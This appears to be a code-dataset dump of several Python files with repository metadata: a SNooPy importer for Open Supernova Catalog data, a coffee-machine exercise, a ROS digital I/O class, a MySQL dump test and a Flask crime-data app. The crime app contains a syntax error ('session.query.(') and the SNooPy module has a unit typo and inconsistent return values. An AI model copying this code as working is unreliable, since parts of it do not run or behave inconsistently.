elif t in ftrans_standard:
b = ftrans_standard[t]
if t not in known_unknowns:
known_unknowns.append(t)
print("Warning: no telescope/system info, assuming ", \
standard_warnings[b[0]], b[0])
elif (t[0],"","","") in ftrans_standard:
b = ftrans_standard[(t[0],"","","")]
if t not in known_unknowns:
known_unknowns.append(t)
print("Warning: telescope/system defined by %s/%s/%s not "\
"recognized, assuming %s %s" %\
(t[1],t[2],t[3],standard_warnings[t[0]],t[0]))
else:
# No idea
if t not in unknown_unknowns:
unknown_unknowns.append(t)
print("Warning: telescope/system defined by %s/%s/%s not "\
"recognized and can't figure out the filter %s" % \
(t[1],t[2],t[3],t[0]))
unknown_unknowns.append(t)
continue
if b not in MJD:
MJD[b] = []
mags[b] = []
emags[b] = []
sids[b] = []
if 'time' in p and 'magnitude' in p:
if not allow_no_errors and 'e_magnitude' not in p and\
'e_lower_magnitude' not in p and 'e_upper_magnitude' not in p:
if 'upperlims' not in warnings: warnings.append('upperlims')
continue
MJD[b].append(float(p['time']))
mags[b].append(float(p['magnitude']))
if 'e_magnitude' in p:
emags[b].append(float(p['e_magnitude']))
elif 'e_lower_magnitude' in p and 'e_upper_magnitude' in p:
emags[b].append((float(p['e_lower_magnitude']) +\
float(p['e_upper_magnitude']))/2)
else:
emags[b].append(missing_error)
elif 'time' in p and 'countrate' in p and 'zeropoint' in p:
if not allow_no_errors and 'e_countrate' not in p:
if 'upperlims' not in warnings: warnings.append('upperlims')
continue
if float(p['countrate']) < 0: continue
MJD[b].append(float(p['time']))
mags[b].append(-2.5*log10(float(p['countrate'])) + \
float(p['zeropoint']))
ec = p.get('e_countrate',None)
if ec is not None:
emags[b].append(1.087*float(p['e_countrate'])/float(p['countrate']))
else:
emags[b].append(missing_error)
else:
if 'upperlims_noerr' not in warnings:
warnings.append('upperlims_noerr')
continue
if this_source not in used_sources:
used_sources.append(this_source)
# At this point we're actually using the photometry, so find source
sid = used_sources.index(this_source)
sids[b].append(sid)
for b in MJD:
if len(MJD[b]) > 0:
snobj.data[b] = lc(snobj, b, array(MJD[b]), array(mags[b]),
array(emags[b]), sids=array(sids[b], dtype=int))
snobj.data[b].time_sort()
snobj.sources = used_sources
snobj.get_restbands()
if len(unknown_unknowns) > 0:
unknown_unknowns = list(set(unknown_unknowns))
print("Warning: the following photometry was not recognized by SNooPy")
print("and was not imported:")
for item in unknown_unknowns:
print(item)
if warnings:
for warning in warnings:
print(warning_message[warning])
# lastly, the spectroscopy
if d.get('spectra',None) is not None:
spectra = []
dates = []
sids = []
for s in d['spectra']:
wu = s.get('u_wavelengths', 'Agnstrom')
fu = s.get('u_fluxes', 'Uncalibrated')
try:
wu = u.Unit(wu)
except ValueError:
print("Warning: unrecognized unit for wavelength: {}".format(wu))
print(" assuming Angstroms")
wu = u.Angstrom
if fu == 'Uncalibrated':
fluxed = False
fu = u.dimensionless_unscaled
else:
try:
fu = u.Unit(fu)
fluxed = True
except ValueError:
print("Warning: unrecognized unit for flux: {}".format(fu))
fluxed = False
fu = u.dimensionless_unscaled
tu = s.get('u_time', 'MJD')
t = float(s['time'])
if tu not in MJD_offsets:
print("Warning: unrecognized time unit: {}".format(tu))
if len(s['time'].split('.')[0]) == 7 and s['time'][0] == '2':
print(" assuming JD")
t = t - 2400000.5
elif len(s['time'].split('.')[0]) == 5 and s['time'][0] == '5':
print(" assuming MJD")
else:
print(" skipping this spectrum.")
continue
w = array([float(item[0]) for item in s['data']])*wu
f = array([float(item[1]) for item in s['data']])*fu
dr = s.get('deredshifted', False)
if dr:
w = w*(1+zhel)
# At this point, we should be able to convert to the units we want
w = w.to('Angstrom').value
if fluxed: f = f.to('erg / (s cm2 Angstrom)')
f = f.value
# source reference
srcs = s.get('source','').split(',')
this_source = None
for src in srcs:
if src in all_sources:
this_source = all_sources[src]
break
if this_source is None:
print("Warning: spectrum has no source")
if this_source not in used_sources:
used_sources.append(this_source)
# At this point we're actually using the spectroscopy, so find source
sid = used_sources.index(this_source)
sids.append(sid)
spectra.append(spectrum(wave=w, flux=f, fluxed=fluxed,
name="Spectrum MJD={:.1f}".format(t)))
dates.append(t)
snobj.sdata = timespec(snobj, dates, spectra)
snobj.sdata.sids = sids
if full_data:
# make a dictionary of the remaining OSC meta data and make it a member
# variable
snobj.osc_meta = {}
for key in d.keys():
if key not in ['name','redshift','ra','dec','sources','photometry',
'spectra']:
snobj.osc_meta[key] = d[key]
return(snobj,'Success')
def to_osc(s, ref=None, bibcode=None, source=1):
'''Given a supernova object, s, output to JSON format suitable for upload to
the OSC.'''
data = {s.name:{"name":s.name}}
if ref or bibcode:
sources = [dict(bibcode=bibcode, name=ref, alias=str(source))]
data['sources'] = sources
phot = []
for filt in s.data:
for i in range(len(s.data[filt].MJD)):
datum = dict(survey='CSP', observatory='LCO')
datum.update(CSP_systems(filt, s.data[filt].MJD[i]))
datum['time'] = "{:.3f}".format(s.data[filt].MJD[i])
datum['u_time'] = "MJD"
datum['magnitude'] = "{:.3f}".format(s.data[filt].mag[i])
flux,eflux = s.data[filt].flux[i],s.data[filt].e_flux[i]
datum['flux'] = "{:.5f}".format(flux)
datum['u_flux'] = "s^-1 cm^-2"
datum['e_flux'] = "{:.5f}".format(eflux)
datum['e_upper_magnitude'] = "{:.3f}".format(
-2.5*log10((flux-eflux)/flux))
datum['e_lower_magnitude'] = "{:.3f}".format(
-2.5*log10(flux/(flux+eflux)))
datum['source'] = "{}".format(source)
phot.append(datum)
data['photometry'] = phot
return json.dumps(data, indent=4)
| 36.05569
| 92
| 0.555906
|
'''
Module for SNooPy to download/parse data from the Open Supernova Catalog.
'''
from __future__ import print_function
import six
import json
if six.PY3:
import urllib.request as urllib
else:
import urllib
from astropy.coordinates import Angle
from snpy import sn,lc,fset
from numpy import array,log10
import astropy.units as u
from snpy.filters import spectrum
from snpy.specobj import timespec
def CfAbands(filt, MJD):
if MJD < 51913.0:
return filt[0]+'s' # standard photometry
elif 51913.0 < MJD < 55058:
if filt[0] == 'U': return 'U4sh'
if filt[0] == 'I': return 'I4sh'
if filt[0] == 'R': return 'R4sh'
return filt[0]+'k1' # natural photometry CfA3 + CfA4 period 1
else:
if filt[0] == 'U': return 'U4sh'
if filt[0] == 'I': return 'I4sh'
if filt[0] == 'R': return 'R4sh'
return filt[0]+'k2' # natural photometry CfA4 period 2
# Some well-known publications and their mappings:
pubs = {
'1999AJ....117..707R': # Riess et al. (1999) Standard Photometry
CfAbands,
'2006AJ....131..527J': # Jha et al. (2006) Standard Photometry
CfAbands,
'2009ApJ...700..331H': # Hicken et al. (2009) CfA3 Natural Photometry
CfAbands,
'2012ApJS..200...12H': # Hicken et al. (2012) CfA4 Natural Photometry
CfAbands
}
# telescope,band --> SNooPy filter database
# We do this by matching (band,system,telescope,observatory) info from the
# database to SNooPy filters.
ftrans = {}
ftrans_standard = {}
standard_warnings = {}
for band in ['u','g','r','i','B','V','Y','J','H','K']:
ftrans[(band,"CSP",'',"LCO")] = band
for band in ['U','B','V','R','I']:
ftrans[(band,'','kait2','')] = band+'kait'
for band in ['U','B','V','R','I']:
ftrans[(band,'','kait3','')] = band+'kait'
for band in ['J','H','Ks']:
ftrans[(band,'','PAIRITEL','')] = band+'2m'
for band in ['B','V','R','I']:
ftrans[(band,'','kait4', '')] = band+'kait'
for band in ['U','V','B']:
ftrans[(band, 'Vega','Swift','')] = band+"_UVOT"
for band in ['UVW1','UVW2','UVM2']:
ftrans[(band, 'Vega','Swift','')] = band
for band in ['g','r','i','z']:
ftrans[(band, '', 'PS1','')] = "ps1_"+band
# These are for data in (what I'm assuming) would be standard filters.
# We will issue a warning, though.
for band in ['U','B','V','R','I']:
ftrans_standard[(band,'','','')] = band+"s"
standard_warnings[band] = "Johnson/Kron/Cousins "
for band in ['u','g','r','i','z']:
ftrans_standard[(band,'','','')] = band+"_40"
standard_warnings[band] = "Sloan (APO) "
for band in ["u'","g'","r'","i'","z'"]:
ftrans_standard[(band,'','','')] = band[0]+"_40"
standard_warnings[band] = "Sloan (USNO-40) "
for band in ["J","H","Ks"]:
ftrans_standard[(band[0],'','','')] = band+"2m"
standard_warnings[band[0]] = "2MASS "
# Our own photometric systems:
def CSP_systems(filt, MJD):
'''Given a filter name and MJD date, output the correct telescope and
system information.'''
if filt == "V":
if MJD < 53748.0:
return (dict(telescope='Swope',instrument='Site2',band='V-3014',
zeropoint="{:.4f}".format(fset['V0'].zp)))
elif MJD < 53759.0:
return (dict(telescope='Swope',instrument='Site2',band='V-3009',
zeropoint="{:.4f}".format(fset['V1'].zp)))
elif MJD < 56566.0:
return (dict(telescope='Swope',instrument='Site2',band='V-9844',
zeropoint="{:.4f}".format(fset['V'].zp)))
else:
return (dict(telescope='Swope',instrument='e2v',band='V-9844',
zeropoint="{:.4f}".format(fset['V2'].zp)))
if filt == "Jrc2":
return (dict(telescope='Swope',instrument='RetroCam',band='J',
zeropoint="{:.4f}".format(fset[filt].zp)))
if filt in ['u','g','r','i','B']:
if MJD < 56566.0:
return (dict(telescope='Swope',instrument='Site2',band=filt,
zeropoint="{:.4f}".format(fset[filt].zp)))
else:
return (dict(telescope='Swope',instrument='e2v',band=filt,
zeropoint="{:.4f}".format(fset[filt+'2'].zp)))
if filt in ['Y','J','H']:
if MJD < 55743.0:
return (dict(telescope='Swope',instrument='RetroCam',band=filt,
zeropoint="{:.4f}".format(fset[filt].zp)))
else:
return (dict(telescope='DuPont',instrument='RetroCam',band=filt,
zeropoint="{:.4f}".format(fset[filt+'d'].zp)))
return({})
MJD_offsets = {
'MJD':0,
'JD':-2400000.5
}
warning_message = {
'upperlims_noerr':'Warning: Data lacking errorbars or with upper-limits not imported',
'upperlims':'Warning: Data with upper-limits not imported',
}
OSC_template = '''https://sne.space/astrocats/astrocats/supernovae/output/json/{}.json'''
def get_obj(url, full_data=True, allow_no_errors=False, missing_error=0.01):
'''Attempt to build a SNooPy object from a Open Supernova Catalog server
URL.'''
if url.find('osc:') == 0:
# Try to construct a url based only on a name.
url = OSC_template.format(url.split(':')[1])
try:
uf = urllib.urlopen(url)
except:
return None,"Invalid URL"
try:
d = json.load(uf)
except:
uf.close()
if full_data:
return None,"Failed to decode JSON",None
return None,"Failed to decode JSON"
else:
uf.close()
# We now have the JSON data. Get the info we need
d = list(d.values())[0]
name = d['name']
if 'redshift' not in d or 'ra' not in d or 'dec' not in d:
return None,"No redshift, RA, or DEC found"
zhel = float(d['redshift'][0]['value'])
ra = Angle(" ".join([d['ra'][0]['value'],d['ra'][0]['u_value']])).degree
decl = Angle(" ".join([d['dec'][0]['value'],d['dec'][0]['u_value']])).degree
snobj = sn(name, ra=ra, dec=decl, z=zhel)
# All primary sources
all_sources_dict = [item for item in d['sources'] \
if not item.get('secondary',False)]
all_sources_dict2 = [item for item in d['sources'] \
if item.get('secondary',False)]
all_sources = {}
for source in all_sources_dict:
all_sources[source['alias']] = (source.get('bibcode',''),
source.get('reference',''))
all_sources2 = {}
for source in all_sources_dict2:
all_sources2[source['alias']] = (source.get('bibcode',''),
source.get('reference',''))
# Next, the photometry.
used_sources = []
MJD = {}
mags = {}
emags = {}
sids = {}
known_unknowns = []
unknown_unknowns = []
warnings = []
photometry = d.get('photometry', [])
for p in photometry:
if p.get('upperlimit',False):
continue
t = (p.get('band',''),p.get('system',''),p.get('telescope',''),
p.get('observatory',''))
# Deal with source of photometry
ss = p.get('source').split(',')
this_source = None
for s in ss:
if s in all_sources:
this_source = all_sources[s]
break
if this_source is None:
for s in ss:
if s in all_sources2:
this_source = all_sources2[s]
if this_source is None:
print("Warning: no primary source, skipping")
continue
bibcode = this_source[0]
if bibcode in pubs:
b = pubs[bibcode](t[0],float(p['time']))
elif t in ftrans:
b = ftrans[t]
elif t in ftrans_standard:
b = ftrans_standard[t]
if t not in known_unknowns:
known_unknowns.append(t)
print("Warning: no telescope/system info, assuming ", \
standard_warnings[b[0]], b[0])
elif (t[0],"","","") in ftrans_standard:
b = ftrans_standard[(t[0],"","","")]
if t not in known_unknowns:
known_unknowns.append(t)
print("Warning: telescope/system defined by %s/%s/%s not "\
"recognized, assuming %s %s" %\
(t[1],t[2],t[3],standard_warnings[t[0]],t[0]))
else:
# No idea
if t not in unknown_unknowns:
unknown_unknowns.append(t)
print("Warning: telescope/system defined by %s/%s/%s not "\
"recognized and can't figure out the filter %s" % \
(t[1],t[2],t[3],t[0]))
unknown_unknowns.append(t)
continue
if b not in MJD:
MJD[b] = []
mags[b] = []
emags[b] = []
sids[b] = []
if 'time' in p and 'magnitude' in p:
if not allow_no_errors and 'e_magnitude' not in p and\
'e_lower_magnitude' not in p and 'e_upper_magnitude' not in p:
if 'upperlims' not in warnings: warnings.append('upperlims')
continue
MJD[b].append(float(p['time']))
mags[b].append(float(p['magnitude']))
if 'e_magnitude' in p:
emags[b].append(float(p['e_magnitude']))
elif 'e_lower_magnitude' in p and 'e_upper_magnitude' in p:
emags[b].append((float(p['e_lower_magnitude']) +\
float(p['e_upper_magnitude']))/2)
else:
emags[b].append(missing_error)
elif 'time' in p and 'countrate' in p and 'zeropoint' in p:
if not allow_no_errors and 'e_countrate' not in p:
if 'upperlims' not in warnings: warnings.append('upperlims')
continue
if float(p['countrate']) < 0: continue
MJD[b].append(float(p['time']))
mags[b].append(-2.5*log10(float(p['countrate'])) + \
float(p['zeropoint']))
ec = p.get('e_countrate',None)
if ec is not None:
emags[b].append(1.087*float(p['e_countrate'])/float(p['countrate']))
else:
emags[b].append(missing_error)
else:
if 'upperlims_noerr' not in warnings:
warnings.append('upperlims_noerr')
continue
if this_source not in used_sources:
used_sources.append(this_source)
# At this point we're actually using the photometry, so find source
sid = used_sources.index(this_source)
sids[b].append(sid)
for b in MJD:
if len(MJD[b]) > 0:
snobj.data[b] = lc(snobj, b, array(MJD[b]), array(mags[b]),
array(emags[b]), sids=array(sids[b], dtype=int))
snobj.data[b].time_sort()
snobj.sources = used_sources
snobj.get_restbands()
if len(unknown_unknowns) > 0:
unknown_unknowns = list(set(unknown_unknowns))
print("Warning: the following photometry was not recognized by SNooPy")
print("and was not imported:")
for item in unknown_unknowns:
print(item)
if warnings:
for warning in warnings:
print(warning_message[warning])
# lastly, the spectroscopy
if d.get('spectra',None) is not None:
spectra = []
dates = []
sids = []
for s in d['spectra']:
wu = s.get('u_wavelengths', 'Agnstrom')
fu = s.get('u_fluxes', 'Uncalibrated')
try:
wu = u.Unit(wu)
except ValueError:
print("Warning: unrecognized unit for wavelength: {}".format(wu))
print(" assuming Angstroms")
wu = u.Angstrom
if fu == 'Uncalibrated':
fluxed = False
fu = u.dimensionless_unscaled
else:
try:
fu = u.Unit(fu)
fluxed = True
except ValueError:
print("Warning: unrecognized unit for flux: {}".format(fu))
fluxed = False
fu = u.dimensionless_unscaled
tu = s.get('u_time', 'MJD')
t = float(s['time'])
if tu not in MJD_offsets:
print("Warning: unrecognized time unit: {}".format(tu))
if len(s['time'].split('.')[0]) == 7 and s['time'][0] == '2':
print(" assuming JD")
t = t - 2400000.5
elif len(s['time'].split('.')[0]) == 5 and s['time'][0] == '5':
print(" assuming MJD")
else:
print(" skipping this spectrum.")
continue
w = array([float(item[0]) for item in s['data']])*wu
f = array([float(item[1]) for item in s['data']])*fu
dr = s.get('deredshifted', False)
if dr:
w = w*(1+zhel)
# At this point, we should be able to convert to the units we want
w = w.to('Angstrom').value
if fluxed: f = f.to('erg / (s cm2 Angstrom)')
f = f.value
# source reference
srcs = s.get('source','').split(',')
this_source = None
for src in srcs:
if src in all_sources:
this_source = all_sources[src]
break
if this_source is None:
print("Warning: spectrum has no source")
if this_source not in used_sources:
used_sources.append(this_source)
# At this point we're actually using the spectroscopy, so find source
sid = used_sources.index(this_source)
sids.append(sid)
spectra.append(spectrum(wave=w, flux=f, fluxed=fluxed,
name="Spectrum MJD={:.1f}".format(t)))
dates.append(t)
snobj.sdata = timespec(snobj, dates, spectra)
snobj.sdata.sids = sids
if full_data:
# make a dictionary of the remaining OSC meta data and make it a member
# variable
snobj.osc_meta = {}
for key in d.keys():
if key not in ['name','redshift','ra','dec','sources','photometry',
'spectra']:
snobj.osc_meta[key] = d[key]
return(snobj,'Success')
def to_osc(s, ref=None, bibcode=None, source=1):
'''Given a supernova object, s, output to JSON format suitable for upload to
the OSC.'''
data = {s.name:{"name":s.name}}
if ref or bibcode:
sources = [dict(bibcode=bibcode, name=ref, alias=str(source))]
data['sources'] = sources
phot = []
for filt in s.data:
for i in range(len(s.data[filt].MJD)):
datum = dict(survey='CSP', observatory='LCO')
datum.update(CSP_systems(filt, s.data[filt].MJD[i]))
datum['time'] = "{:.3f}".format(s.data[filt].MJD[i])
datum['u_time'] = "MJD"
datum['magnitude'] = "{:.3f}".format(s.data[filt].mag[i])
flux,eflux = s.data[filt].flux[i],s.data[filt].e_flux[i]
datum['flux'] = "{:.5f}".format(flux)
datum['u_flux'] = "s^-1 cm^-2"
datum['e_flux'] = "{:.5f}".format(eflux)
datum['e_upper_magnitude'] = "{:.3f}".format(
-2.5*log10((flux-eflux)/flux))
datum['e_lower_magnitude'] = "{:.3f}".format(
-2.5*log10(flux/(flux+eflux)))
datum['source'] = "{}".format(source)
phot.append(datum)
data['photometry'] = phot
return json.dumps(data, indent=4)
| 0
| 0
| 0
| 0
| 0
| 476
| 0
| -3
| 23
|
b838c3e4fd3bce1a2cc716eb2ba8a849168a9356
| 744
|
py
|
Python
|
Day 15 - OOP/main.py
|
secureterminal/100-Days-of-Code
|
04383ae541938d8a551b5aac9a0dad3348a6ef23
|
[
"MIT"
] | 1
|
2022-01-28T13:55:39.000Z
|
2022-01-28T13:55:39.000Z
|
Day 15 - OOP/main.py
|
secureterminal/100-Days-of-Code
|
04383ae541938d8a551b5aac9a0dad3348a6ef23
|
[
"MIT"
] | 1
|
2022-02-02T00:13:18.000Z
|
2022-02-03T11:32:53.000Z
|
Day 15 - OOP/main.py
|
secureterminal/100-Days-of-Code
|
04383ae541938d8a551b5aac9a0dad3348a6ef23
|
[
"MIT"
] | 2
|
2022-02-07T20:49:36.000Z
|
2022-02-19T21:22:15.000Z
|
from menu import Menu
from coffee_maker import CoffeeMaker
from money_machine import MoneyMachine
money_machine = MoneyMachine()
coffee_maker = CoffeeMaker()
menu = Menu()
coffee_maker.report()
money_machine.report()
coffee_machine_is_on = True
while coffee_machine_is_on:
choices = menu.get_items()
user_order = input(f'Please choose a coffee: ({choices})>>> ')
if user_order == 'off':
coffee_machine_is_on = False
elif user_order == 'report':
coffee_maker.report()
money_machine.report()
else:
drink = menu.find_drink(user_order)
if coffee_maker.is_resource_sufficient(drink) and money_machine.make_payment(drink.cost):
coffee_maker.make_coffee(drink)
| 24.8
| 97
| 0.717742
|
from menu import Menu, MenuItem
from coffee_maker import CoffeeMaker
from money_machine import MoneyMachine
money_machine = MoneyMachine()
coffee_maker = CoffeeMaker()
menu = Menu()
coffee_maker.report()
money_machine.report()
coffee_machine_is_on = True
while coffee_machine_is_on:
choices = menu.get_items()
user_order = input(f'Please choose a coffee: ({choices})>>> ')
if user_order == 'off':
coffee_machine_is_on = False
elif user_order == 'report':
coffee_maker.report()
money_machine.report()
else:
drink = menu.find_drink(user_order)
if coffee_maker.is_resource_sufficient(drink) and money_machine.make_payment(drink.cost):
coffee_maker.make_coffee(drink)
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 10
| 0
|
fc8a2c85d00bef3bd3bd075b7a046a93e1e9c68c
| 4,269
|
py
|
Python
|
intera_interface/src/intera_interface/digital_io.py
|
thinclab/intera_sdk
|
556de67a88049687404734404e16b147943cde3c
|
[
"Apache-2.0"
] | 38
|
2017-01-20T15:44:22.000Z
|
2022-01-28T15:15:40.000Z
|
intera_interface/src/intera_interface/digital_io.py
|
thinclab/intera_sdk
|
556de67a88049687404734404e16b147943cde3c
|
[
"Apache-2.0"
] | 47
|
2016-12-16T19:41:03.000Z
|
2022-03-21T14:04:04.000Z
|
intera_interface/src/intera_interface/digital_io.py
|
thinclab/intera_sdk
|
556de67a88049687404734404e16b147943cde3c
|
[
"Apache-2.0"
] | 52
|
2017-02-03T13:26:23.000Z
|
2021-03-16T14:25:51.000Z
|
# Copyright (c) 2013-2018, Rethink Robotics Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
| 29.853147
| 79
| 0.606699
|
# Copyright (c) 2013-2018, Rethink Robotics Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import errno
import rospy
import intera_dataflow
from intera_core_msgs.msg import (
DigitalIOState,
DigitalOutputCommand,
)
class DigitalIO(object):
"""
DEPRECATION WARNING: This interface will likely be removed in
the future. Transition to using the IO Framework and the wrapper
classes: gripper.py, cuff.py, camera.py
Interface class for a simple Digital Input and/or Output on the
Intera robots.
Input
- read input state
Output
- turn output On/Off
- read current output state
"""
def __init__(self, component_id):
"""
Constructor.
@param component_id: unique id of the digital component
"""
self._id = component_id
self._component_type = 'digital_io'
self._is_output = False
self._state = None
self.state_changed = intera_dataflow.Signal()
type_ns = '/robot/' + self._component_type
topic_base = type_ns + '/' + self._id
self._sub_state = rospy.Subscriber(
topic_base + '/state',
DigitalIOState,
self._on_io_state)
intera_dataflow.wait_for(
lambda: self._state != None,
timeout=2.0,
timeout_msg="Failed to get current digital_io state from %s" \
% (topic_base,),
)
# check if output-capable before creating publisher
if self._is_output:
self._pub_output = rospy.Publisher(
type_ns + '/command',
DigitalOutputCommand,
queue_size=10)
def _on_io_state(self, msg):
"""
Updates the internally stored state of the Digital Input/Output.
"""
new_state = (msg.state == DigitalIOState.PRESSED)
if self._state is None:
self._is_output = not msg.isInputOnly
old_state = self._state
self._state = new_state
# trigger signal if changed
if old_state is not None and old_state != new_state:
self.state_changed(new_state)
@property
def is_output(self):
"""
Accessor to check if IO is capable of output.
"""
return self._is_output
@property
def state(self):
"""
Current state of the Digital Input/Output.
"""
return self._state
@state.setter
def state(self, value):
"""
Control the state of the Digital Output. (is_output must be True)
@type value: bool
@param value: new state to output {True, False}
"""
self.set_output(value)
def set_output(self, value, timeout=2.0):
"""
Control the state of the Digital Output.
Use this function for finer control over the wait_for timeout.
@type value: bool
@param value: new state {True, False} of the Output.
@type timeout: float
@param timeout: Seconds to wait for the io to reflect command.
If 0, just command once and return. [0]
"""
if not self._is_output:
raise IOError(errno.EACCES, "Component is not an output [%s: %s]" %
(self._component_type, self._id))
cmd = DigitalOutputCommand()
cmd.name = self._id
cmd.value = value
self._pub_output.publish(cmd)
if not timeout == 0:
intera_dataflow.wait_for(
test=lambda: self.state == value,
timeout=timeout,
rate=100,
timeout_msg=("Failed to command digital io to: %r" % (value,)),
body=lambda: self._pub_output.publish(cmd)
)
| 0
| 465
| 0
| 3,049
| 0
| 0
| 0
| 44
| 115
|
07a2a8bad2c82e238b18e385c8b1b2d9e1a12999
| 2,535
|
py
|
Python
|
tests/models/mysql_dumps_test.py
|
ywlianghang/mysql_streamer
|
7fc85efaca3db6a387ea4b791632c2df2d04cb3e
|
[
"Apache-2.0"
] | 419
|
2016-11-17T18:41:47.000Z
|
2022-03-14T02:50:02.000Z
|
tests/models/mysql_dumps_test.py
|
ywlianghang/mysql_streamer
|
7fc85efaca3db6a387ea4b791632c2df2d04cb3e
|
[
"Apache-2.0"
] | 19
|
2016-11-30T18:09:00.000Z
|
2019-04-02T06:20:02.000Z
|
tests/models/mysql_dumps_test.py
|
ywlianghang/mysql_streamer
|
7fc85efaca3db6a387ea4b791632c2df2d04cb3e
|
[
"Apache-2.0"
] | 90
|
2016-11-23T06:26:20.000Z
|
2022-01-22T09:24:42.000Z
|
# -*- coding: utf-8 -*-
# Copyright 2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
from __future__ import unicode_literals
| 28.483146
| 77
| 0.672189
|
# -*- coding: utf-8 -*-
# Copyright 2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
from __future__ import unicode_literals
import pytest
from replication_handler.models.mysql_dumps import MySQLDumps
@pytest.mark.itest
@pytest.mark.itest_db
class TestMySQLDumps(object):
@pytest.fixture
def cluster_name(self):
return 'yelp_main'
@pytest.fixture
def test_dump(self):
return 'This is a test dump'
@pytest.yield_fixture
def initialize_dump(
self,
sandbox_session,
cluster_name,
test_dump
):
assert MySQLDumps.dump_exists(sandbox_session, cluster_name) is False
test_mysql_dump = MySQLDumps.update_mysql_dump(
session=sandbox_session,
database_dump=test_dump,
cluster_name=cluster_name
)
sandbox_session.flush()
assert MySQLDumps.dump_exists(sandbox_session, cluster_name) is True
yield test_mysql_dump
def test_get_latest_mysql_dump(
self,
initialize_dump,
cluster_name,
test_dump,
sandbox_session
):
new_dump = 'This is a new dump'
retrieved_dump = MySQLDumps.get_latest_mysql_dump(
session=sandbox_session,
cluster_name=cluster_name
)
assert retrieved_dump == test_dump
MySQLDumps.update_mysql_dump(
session=sandbox_session,
database_dump=new_dump,
cluster_name=cluster_name
)
returned_new_dump = MySQLDumps.get_latest_mysql_dump(
session=sandbox_session,
cluster_name=cluster_name
)
assert returned_new_dump == new_dump
MySQLDumps.delete_mysql_dump(
session=sandbox_session,
cluster_name=cluster_name
)
dump_exists = MySQLDumps.dump_exists(
session=sandbox_session,
cluster_name=cluster_name
)
assert not dump_exists
| 0
| 1,756
| 0
| 0
| 0
| 0
| 0
| 32
| 69
|
0ec5fc82f6363d39869fe20305aa7077435f30d4
| 1,232
|
py
|
Python
|
WORK/working/crime_vis/crime.py
|
jessicagtz/WorkingFolder
|
4791618e1ec12b9cc38a6ceb1ff03bab1799b0bc
|
[
"MIT"
] | null | null | null |
WORK/working/crime_vis/crime.py
|
jessicagtz/WorkingFolder
|
4791618e1ec12b9cc38a6ceb1ff03bab1799b0bc
|
[
"MIT"
] | null | null | null |
WORK/working/crime_vis/crime.py
|
jessicagtz/WorkingFolder
|
4791618e1ec12b9cc38a6ceb1ff03bab1799b0bc
|
[
"MIT"
] | 1
|
2018-12-06T21:33:44.000Z
|
2018-12-06T21:33:44.000Z
|
# import dependencies
from flask import Flask
from sqlalchemy.ext.automap import automap_base
from sqlalchemy.orm import Session
from sqlalchemy import create_engine
# database setup using automap
engine = create_engine("sqlite:///chi_db.sqlite")
Base = automap_base()
# reflect the tables
Base.prepare(engine, reflect=True)
# Save references to the tables
AllCrime = Base.classes.all_crime
# Create our session (link) from Python to the DB
session = Session(engine)
# initialize Flask
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = "sqlite:///chi_db.sqlite"
if __name__ == "__main__":
app.run(debug=True)
| 27.377778
| 117
| 0.730519
|
# import dependencies
from flask import Flask, jsonify, render_template, request, redirect
from sqlalchemy.ext.automap import automap_base
from sqlalchemy.orm import Session
from sqlalchemy import create_engine, func, inspect
import pandas as pd
import numpy as np
import datetime as dt
# database setup using automap
engine = create_engine("sqlite:///chi_db.sqlite")
Base = automap_base()
# reflect the tables
Base.prepare(engine, reflect=True)
# Save references to the tables
AllCrime = Base.classes.all_crime
# Create our session (link) from Python to the DB
session = Session(engine)
# initialize Flask
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = "sqlite:///chi_db.sqlite"
@app.route("/crimehistory")
def crime_dict(crime):
results = session.query.(AllCrime.id, AllCrime.crimeGroup, AllCrime.year,AllCrime.nunCrimes).filter(AllCrimes.id)
dict=[]
for result in results:
crime_dict= {}
crime_dict["year"] = result.year
crime_dict["id"] = result.id
crime_dict["crimeGroup"] = result.crimeGroup
crime_dict["nunCrimes"] = result.nunCrimes
dict.append(crime_dict)
return jsonify(dict)
if __name__ == "__main__":
app.run(debug=True)
| 0
| 449
| 0
| 0
| 0
| 0
| 0
| 55
| 95
|